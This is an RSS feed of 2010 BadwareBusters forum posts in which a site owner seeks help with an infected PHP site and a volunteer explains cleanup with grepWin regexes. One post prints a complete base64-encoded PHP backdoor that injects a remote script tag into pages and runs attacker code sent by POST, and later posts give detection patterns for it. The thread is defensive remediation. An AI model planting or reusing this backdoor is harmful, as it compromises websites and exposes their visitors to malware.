<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>BadwareBusters - Messages tagged with: js</title>
    <link>http://badwarebusters.org/main/conversations?view=tag&amp;tag=js</link>
    <description>All BadwareBusters messages tagged with &quot;js.&quot;</description>
    <language>en-us</language>
    <item>
      <title>I have sent you a zip containing the source of the s...</title>
      <description>&lt;p&gt;I have sent you a zip containing the source of the site.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (odinn)</author>
      <pubDate>Sun, 21 Feb 2010 08:08:26 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/14973#itemblock-14986</link>
      <guid>http://badwarebusters.org/main/itemview/14973#itemblock-14986</guid>
    </item>
    <item>
      <title>Those are bad as well.

use this search string:
...</title>
      <description>&lt;p&gt;Those are bad as well.&lt;/p&gt;
&lt;p&gt;Use this search string:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5&amp;gt;.*?&amp;lt;\/kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;To find and remove those.&lt;/p&gt;
&lt;p&gt;Can you zip those files and send them to me in an emai?. I&amp;#8217;d like to analyze them further.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
&lt;p&gt;Thomas J. Raef&lt;br /&gt;
&amp;#8220;We Watch Your Website &amp;#8211; so you don&amp;#8217;t have to!&amp;#8221;&lt;br /&gt;
&lt;a href=&quot;http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.wewatchyourwebsite.com&quot; rel=&quot;nofollow&quot;&gt;http://www.wewatchyourwebsite.com&lt;/a&gt;&lt;br /&gt;
traef@wewatchyourwebsite.com&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (WeWatch)</author>
      <pubDate>Sun, 21 Feb 2010 07:38:30 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/14973#itemblock-14984</link>
      <guid>http://badwarebusters.org/main/itemview/14973#itemblock-14984</guid>
    </item>
    <item>
      <title>I am the only one that accesses the ftp and manager ...</title>
      <description>&lt;p&gt;I am the only one that accesses the ftp and manager (all the tools are online nothing is installed on my pc). I am now cleaning the tags that I found.&lt;/p&gt;
&lt;p&gt;One more thing. I have also noticed new tags:&lt;/p&gt;
&lt;p&gt;&amp;lt; kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5 &amp;gt; &amp;lt; / kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5 &amp;gt;&lt;/p&gt;
&lt;p&gt;with and without text between them.&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (odinn)</author>
      <pubDate>Sun, 21 Feb 2010 07:33:59 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/14973#itemblock-14983</link>
      <guid>http://badwarebusters.org/main/itemview/14973#itemblock-14983</guid>
    </item>
    <item>
      <title>I believe that you'll find a virus on either your pc...</title>
      <description>&lt;p&gt;I believe that you&amp;#8217;ll find a virus on either your PC or the PC of someone who has/had &lt;span&gt;FTP&lt;/span&gt; access to your website.&lt;/p&gt;
&lt;p&gt;In removing the base64_decode strings, you&amp;#8217;ll be removing backdoors as well.&lt;/p&gt;
&lt;p&gt;Do you have access to the &lt;span&gt;FTP&lt;/span&gt; logs? If so, scan those to see the IP addresses of file transfers that show the files you&amp;#8217;ve been seeing getting infected. Chances are you&amp;#8217;ll see some strange IP addresses sending files to your site. Those people obtained &lt;span&gt;FTP&lt;/span&gt; access by a virus.&lt;/p&gt;
&lt;p&gt;One thing I have people do is to assign a different login name to anyone who needs &lt;span&gt;FTP&lt;/span&gt; access to their site. That way, if your site gets infected, you can scan through the &lt;span&gt;FTP&lt;/span&gt; logs and see which login name was used. They&amp;#8217;re the one who has a virus.&lt;/p&gt;
&lt;p&gt;Post back&amp;#8230;&lt;/p&gt;
&lt;p&gt;Thomas J. Raef&lt;br /&gt;
&amp;#8220;We Watch Your Website &amp;#8211; so you don&amp;#8217;t have to!&amp;#8221;&lt;br /&gt;
&lt;a href=&quot;http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.wewatchyourwebsite.com&quot; rel=&quot;nofollow&quot;&gt;http://www.wewatchyourwebsite.com&lt;/a&gt;&lt;br /&gt;
traef@wewatchyourwebsite.com&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (WeWatch)</author>
      <pubDate>Sun, 21 Feb 2010 07:03:53 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/14973#itemblock-14981</link>
      <guid>http://badwarebusters.org/main/itemview/14973#itemblock-14981</guid>
    </item>
    <item>
      <title>Great thanks! i did not know that there is a grep pr...</title>
      <description>&lt;p&gt;Great thanks! I did not know that there is a grep program for windows :)&lt;/p&gt;
&lt;p&gt;I will scan the files with grep and replace the bad code.&lt;/p&gt;
&lt;p&gt;The question is&amp;#8230; How do I scan my code for the source of the problem&amp;#8230; If let&amp;#8217;s say Avast finds nothing on my PC and I upload the clean code I still need some sort of a code scanned that will help me find the cause of the problem and eliminate it so it won&amp;#8217;t happen again&amp;#8230; Or is it a problem that no one found a solution for yet?&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (odinn)</author>
      <pubDate>Sun, 21 Feb 2010 06:58:58 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/14973#itemblock-14980</link>
      <guid>http://badwarebusters.org/main/itemview/14973#itemblock-14980</guid>
    </item>
    <item>
      <title>I had been recommending avg however, lately i've see...</title>
      <description>&lt;p&gt;I had been recommending &lt;span&gt;AVG&lt;/span&gt; however, lately I&amp;#8217;ve seen many viruses getting past them.&lt;/p&gt;
&lt;p&gt;Many have had good success with Avast, F-Prot or Kaspersky.&lt;/p&gt;
&lt;p&gt;Ok, download grepWin here: http://code.google.com/p/grepwin/downloads/list, I usually take the .msi file.&lt;/p&gt;
&lt;p&gt;Then install it on the PC with access to the full set of files from the website.&lt;/p&gt;
&lt;p&gt;Open it and in the top line, use the button with &amp;#8230; to navigate to the main folder where the website files reside.&lt;/p&gt;
&lt;p&gt;Then set the following options (I&amp;#8217;ll provide you with search strings further down):&lt;/p&gt;
&lt;p&gt;Select Regex search&lt;br /&gt;
uncheck Search case-sensitive&lt;br /&gt;
check Dot matches newline&lt;br /&gt;
check Create backup files&lt;br /&gt;
uncheck Treat files as UTF8&lt;/p&gt;
&lt;p&gt;select All sizes&lt;br /&gt;
check Include system files&lt;br /&gt;
check Include hidden files&lt;br /&gt;
check Include subfolders&lt;/p&gt;
&lt;p&gt;Now for the search strings. You have to use them one at a time.&lt;/p&gt;
&lt;p&gt;First to eliminate the base64_decode strings use:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;\?php eval\(base64_decode\([\'|\&quot;.*?[\'|\&quot;]\)\); \?&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This will remove not only what you found above, but other variations.&lt;/p&gt;
&lt;p&gt;I believe that if you found malscripts in the .js files, they probably started with document.write. Am I correct? If so, then use this string to eliminate them:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;document\.write\('&amp;lt;script src=http:\/\/.*?\.php &amp;gt;&amp;lt;\\/script&amp;gt;'\);&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Then, first select Search with the first search string to see in the Search results window what files it finds that match. If you right-click on the first one you can open it with Wordpad to verify that it does include the base64_decode string.&lt;/p&gt;
&lt;p&gt;Then hit Replace. This will not only remove the malscript from all the files, but will also make a backup of the original file.&lt;/p&gt;
&lt;p&gt;Upload the clean files to your website and you should be clean.&lt;/p&gt;
&lt;p&gt;Post back here with any questions or updates please.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
&lt;p&gt;Thomas J. Raef&lt;br /&gt;
&amp;#8220;We Watch Your Website &amp;#8211; so you don&amp;#8217;t have to!&amp;#8221;&lt;br /&gt;
&lt;a href=&quot;http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.wewatchyourwebsite.com&quot; rel=&quot;nofollow&quot;&gt;http://www.wewatchyourwebsite.com&lt;/a&gt;&lt;br /&gt;
traef@wewatchyourwebsite.com&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (WeWatch)</author>
      <pubDate>Sun, 21 Feb 2010 06:54:15 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/14973#itemblock-14979</link>
      <guid>http://badwarebusters.org/main/itemview/14973#itemblock-14979</guid>
    </item>
    <item>
      <title>Thank you for the quick reply. yes i can download th...</title>
      <description>&lt;p&gt;Thank you for the quick reply. Yes I can download the entire site to my PC and I do have a backup downloaded already with the problem.&lt;/p&gt;
&lt;p&gt;Please provide me with instruction on how to scan the files.&lt;/p&gt;
&lt;p&gt;What program do you recommend for the virus scan&amp;#8230; The company I work for is a small one and they chose to use &lt;span&gt;AVG&lt;/span&gt;&amp;#8230;&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (odinn)</author>
      <pubDate>Sun, 21 Feb 2010 06:38:33 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/14973#itemblock-14978</link>
      <guid>http://badwarebusters.org/main/itemview/14973#itemblock-14978</guid>
    </item>
    <item>
      <title>Scanning your site from the &amp;quot;outside&amp;quot; won't find the...</title>
      <description>&lt;p&gt;Scanning your site from the &amp;#8220;outside&amp;#8221; won&amp;#8217;t find the eval(base64_decode strings because those are in .php files which will render when accessed from the outside.&lt;/p&gt;
&lt;p&gt;Your site needs to be scanned while not viewing from the outside. Do you have the entire site downloaded to your PC? If so, I can provide you with instructions on how to scan your files quickly. If not, we can do this for you.&lt;/p&gt;
&lt;p&gt;Often times the virus that steals &lt;span&gt;FTP&lt;/span&gt; passwords knows how to evade detection of the currently installed anti-virus program so you may need to use a different program in order to really determine if your PC is virus free.&lt;/p&gt;
&lt;p&gt;Please post back here with your questions or updates.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
&lt;p&gt;Thomas J. Raef&lt;br /&gt;
&amp;#8220;We Watch Your Website &amp;#8211; so you don&amp;#8217;t have to!&amp;#8221;&lt;br /&gt;
&lt;a href=&quot;http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.wewatchyourwebsite.com&quot; rel=&quot;nofollow&quot;&gt;http://www.wewatchyourwebsite.com&lt;/a&gt;&lt;br /&gt;
traef@wewatchyourwebsite.com&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (WeWatch)</author>
      <pubDate>Sun, 21 Feb 2010 06:28:00 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/14973#itemblock-14976</link>
      <guid>http://badwarebusters.org/main/itemview/14973#itemblock-14976</guid>
    </item>
    <item>
      <title>Added tags with eval in them (base64 encrypted code)...</title>
      <description>&lt;p&gt;Hey.&lt;/p&gt;
&lt;p&gt;I started working on a site that was almoust done. My job was to finish it.&lt;br /&gt;
While working on this site Google tagged it.&lt;/p&gt;
&lt;p&gt;I was going through the code and some strange code was added:&lt;/p&gt;
&lt;p&gt;e.g:&lt;/p&gt;
&lt;p&gt;&amp;lt;?php eval(base64_decode(&amp;#8216;aWYoIWZ1bmN0aW9uX2V4aXN0cygnazVyaGQnKSl7ZnVuY3Rpb24gazVyaGQoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkZ1WjNKNUxXRnVaMlZzY3k1a1pTOWpiMjUwWlc1MEwzSnZZbTkwY3k1d2FIQWdQand2YzJOeWFYQjBQZz09JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBrNXJoZDIoJGEsJGIsJGMsJGQpe2dsb2JhbCRrNXJoZDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGs1cmhkMSkpY2FsbF91c2VyX2Z1bmMoJGs1cmhkMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nazVyaGQnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdrNXJoZCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRrNXJoZGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2s1cmhkMicpKSE9J2s1cmhkMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7&amp;#8217;)); ?&amp;gt;&lt;/p&gt;
&lt;p&gt;Translated:&lt;/p&gt;
&lt;p&gt;if(&amp;lt;img title=&quot;$a=@set_error_handler(&amp;amp;#39;k5rhd2&amp;amp;#39;)&quot; /&amp;gt;=&amp;#8216;k5rhd2&amp;#8217;)?$a:0;eval(base64_decode($_POST[&amp;#8216;e&amp;#8217;]));&lt;/p&gt;
&lt;p&gt;And it added &amp;lt;sc&amp;nbsp;ript src=&quot;http://....&quot;&amp;gt;&amp;lt;/sc&amp;nbsp;ript&amp;gt; to the .js files&amp;#8230;&lt;/p&gt;
&lt;p&gt;Meaning, they are also running their own php scripts on our site and also adding the code I have showed you earlier&amp;#8230;&lt;/p&gt;
&lt;p&gt;I have changed the password to my ftp/site admin page.&lt;br /&gt;
I am using hostmonster.com as a host.&lt;/p&gt;
&lt;p&gt;The code that I am working on was written by other people and it is a bit large and has alot of rewritten parts in different files.&lt;/p&gt;
&lt;p&gt;The problem is that I can&amp;#8217;t scan manually for any input checks and etc.. because I will get lost&amp;#8230;&lt;/p&gt;
&lt;p&gt;The website is : http://www.jobzone.co.il/index_temp.php and http://www,jobzone.co.il/&lt;/p&gt;
&lt;p&gt;The first one got a bit defaced by a recent attack so it has lot&amp;#8217;s of question marks&amp;#8230; You can translate http://www.jobzone.co.il with Google. The website is in hebrew&amp;#8230; Sorry.&lt;/p&gt;
&lt;p&gt;I would appreciate if you scan the website and tell me where the problem may be&amp;#8230; I know what code it injects I need to know where is the security hole that causes it&amp;#8230;&lt;/p&gt;
&lt;p&gt;If you can also please recommend a decent (if possible free) scanning tool.&lt;/p&gt;
&lt;p&gt;My AV software found no viruses or trojans or infected cookie files on my pc. I will check the other PCs aswell.&lt;/p&gt;
&lt;p&gt;Thank you in advance!&lt;br /&gt;
Odinn.&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (odinn)</author>
      <pubDate>Sun, 21 Feb 2010 04:31:48 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/14973#itemblock-14973</link>
      <guid>http://badwarebusters.org/main/itemview/14973#itemblock-14973</guid>
    </item>
    <item>
      <title>Help with site malware...</title>
      <description>&lt;p&gt;Site in question &amp;#8211; www.nationwidebackgroundchecks.com&lt;br /&gt;
Just found out that this site has malware&amp;#8230; a bit of a noob with this. Where do I look to get rid of this?&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (Heavypen)</author>
      <pubDate>Tue, 10 Nov 2009 11:34:29 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/11569#itemblock-11569</link>
      <guid>http://badwarebusters.org/main/itemview/11569#itemblock-11569</guid>
    </item>
  </channel>
</rss>
